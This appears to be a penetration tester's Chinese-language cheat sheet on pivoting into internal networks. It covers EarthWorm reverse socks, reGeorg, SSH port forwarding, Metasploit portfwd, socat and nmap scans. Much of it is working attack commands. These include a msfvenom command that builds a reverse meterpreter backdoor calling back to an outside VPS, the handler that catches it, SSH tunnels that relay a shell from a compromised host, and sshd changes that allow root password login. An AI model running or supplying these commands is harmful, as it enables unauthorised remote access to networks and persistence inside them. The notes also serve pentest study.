1、ew
攻擊者windows:192.168.20.112(外網)
服務器linux:192.168.61.141(內網)
攻擊者運行,將8081端口流量轉發到1081端口
C:\Users\Administrator\Desktop\ew\release>ew_win32.exe -s rcsocks -l 1081 -e 8081
服務器上運行下面命令,連接攻擊者的8081端口
./ew_linux_x64 -s rssocks -d 192.168.20.112 -e 8081
成功建立連接。
設置好代理
這樣打開應用。
訪問內網應用
ew代替lcx實現端口轉發
vps運行:./ew_linux_x64 -s lcx_listen -l 1080 -e 8889
內網機器:ew_win32.exe -s lcx_slave -d 68.183.180.185 -e 8889 -f 127.0.0.1 -g 80 // 68.183.180.185vps地址 。將內網80端口流量轉發到vps的1080流量
參考鏈接:
https://xz.aliyun.com/t/260
https://bbs.ichunqiu.com/thread-36219-1-2.html
這個方法挺實用
2、reGeorg+proxifier
直接參考天哥文章,寫的相當詳細了。
這里注意下用設置好代理后掃描端口時用如下命令:
nmap -Pn -sT 192.168.60.128。
參考鏈接:
https://mp.weixin.qq.com/s/9ZjlkuoyT4Da-77_9Y7teg
3、ssh隧道代理轉發
說明一下,下面a,b是端口轉發 c是做soket代理。
a.本地轉發
攻擊機:192.168.61.142
肉雞:178.128.216.86
遠程管理服務器上的 mysql,mysql 不能直接 root 遠程登陸。這時候就可以通過本地轉發,通過 ssh 將服務器的 3306 端口轉發到本地 1234 端口
直接連接遠程服務器的mysql服務器,顯示拒絕連接。當把端口轉發出來在連接,連接本地1234端口-->相當於連接遠程服務器的3306端口
說明一下上面的操作是在192.168.61.142上操作,需要輸入肉雞的ssh密碼
b.遠程轉發
這個功能經常使用,內網的攻擊機kali系統,通過外網vps轉發,彈shell到內網kali,通過vps轉發
編輯如下配置:
#vi /etc/ssh/sshd_config
PermitRootLogin yes 允許root遠程登陸,其實並不建議這樣干
AllowTcpForwarding yes
GatewayPorts yes
TCPKeepAlive yes 保持心跳,防止ssh斷開
PasswordAuthentication yes
ServerAliveInterval=20
ServerAliveCountMax=8
# /etc/init.d/sshd restart
攻擊機:178.128.216.86
肉雞:192.168.61.142
以下操作是在192.168.61.142上
ssh -CfNg -R 81:127.0.0.1:80 root@178.128.216.86
將肉雞的80端口轉發到攻擊機的8888端口上
在攻擊機上訪問本地的8888端口相當於訪問肉雞的80端口
遠程轉發缺點就在於因為是在肉雞上操作,並且輸入了攻擊機的密碼,如果肉雞上有鍵盤記錄,攻擊機就遭殃了。
外網vps做跳板,內網kali滲透目標網段
內網ip:192.168.172.137(運行kali)
外網vps:68.183.180.185(當跳板)
拿到shell的機器:178.128.24.7
生成后門
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=68.183.180.185 LPORT=4321 -f elf -o shell86
內網kali上:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.172.137
set lport 4321
run
內網kali上,開啟轉發(注意ip寫192.168.172.137不要寫127.0.0.1),把上面的ssh配置做了。
ssh -CfNg -R 4321:192.168.172.137:4321 root@68.183.180.185
拿到shell的機器運行shell86
內網kali拿到shell.
https://klionsec.github.io/2016/09/21/ssh-portforward/
c.ssh動態轉發 socks 代理(最常用)
攻擊機:192.168.61.142
肉雞:178.128.216.86
肉雞 是個國外的vps,在國內是訪問不了google的。
在攻擊機上輸入ssh -qTfnN -D 1080 root@178.128.216.86
設置好代理鏈:
訪問google(這里google相當於內網的服務)
vps上有一張內網網卡
訪問內網中的服務。
參考鏈接:
https://xz.aliyun.com/t/142/#toc-9
http://blog.creke.net/722.html
https://xz.aliyun.com/t/1862
4、 msf代理
下面這篇文章寫得挺好,利用msf設置socket 4a代理,用永恆之藍打內網
參考鏈接:
https://www.anquanke.com/post/id/86505
msf端口轉發,當我們在瀏覽器中向本地2323端口發送一個鏈接請求時,該連接請求將會轉發到IP地址為7.7.7.20的計算機的80端口
meterpreter > portfwd add -L 172.16.0.20 -l 2323 -p 80 -r 7.7.7.20
參考鏈接:
https://www.freebuf.com/articles/network/125278.html
https://klionsec.github.io/2016/09/25/msf-socks4a/
5、socat
socat功能跟nc差不多,比nc強大的點是類似於ssh的本地轉發
訪問數據庫
下面第二個鏈接是一個腳本,安裝socat並且后台轉發端口流量
和上面命令一樣:
請輸入本地端口:8888
請輸入遠程端口:80
請輸入遠程IP:178.120.216.86
參考鏈接:
http://brieflyx.me/2015/linux-tools/socat-introduction/
https://www.cokemine.com/socat-one.html
6、其他
還有一種思路是在跳板機搭建vpn服務,將vpn服務的端口映射到防火牆外邊來。這里面的細節不是太清楚,來年請教下蛋哥。
7、二級代理
這倆次代理都是通過,regeorg跳
或者172.16.1.129這台機器加入沒有web服務,可以通過開啟socks5代理,代理到192.168.232.0網絡
開啟socks5服務器的可以用ew -s ssocksd -l 8889或者python reprocks_client.py -m 3 8889(reprocks工具挺好用的,工具在這里:https://github.com/RicterZ/reprocks)
或者可以設置個代理鏈:
最后說一下nmap常用掃描命令:
存活掃描:
nmap -sP 192.168.0.0/24
指定端口范圍掃描:
nmap -sT -Pn 192.168.0.1 -p(start)-(end)
全端口掃描:
nmap -sT 192.168.0.1
UDP端口掃描:
nmap -sU 192.168.0.1
操作系統識別:
nmap -sS -O 192.168.0.1
[Nmap在VMware NAT網絡下探測主機存活誤報的分析](https://mp.weixin.qq.com/s/U9W_77Ao7YoO9-Y4Xgsh9g)
nmap -sn -PE -n 192.168.0.0/24
內網滲透備忘錄:
https://tom0li.github.io/%E5%86%85%E7%BD%91%E5%A4%87%E5%BF%98%E5%BD%95/
以上屬於比較簡單的代理設置,當你處於內網環境時,誰也不知道防火牆或者IDS檢查什么流量,可以嘗試udp隧道,dns隧道,http隧道,socket隧道,tcp隧道,socket4a,icmp隧道。
dns隧道搭建參考這篇:
http://www.4hou.com/technology/3143.html?spm=a2c4e.11153940.blogcont222429.9.15bc5305mjB3rK
icmp隧道參考這篇文章:
https://xz.aliyun.com/t/2379
最最后實力推薦這個博客,寫的是巨好,有13篇:通向彼岸之xxxx都是關於代理的講解:
https://klionsec.github.io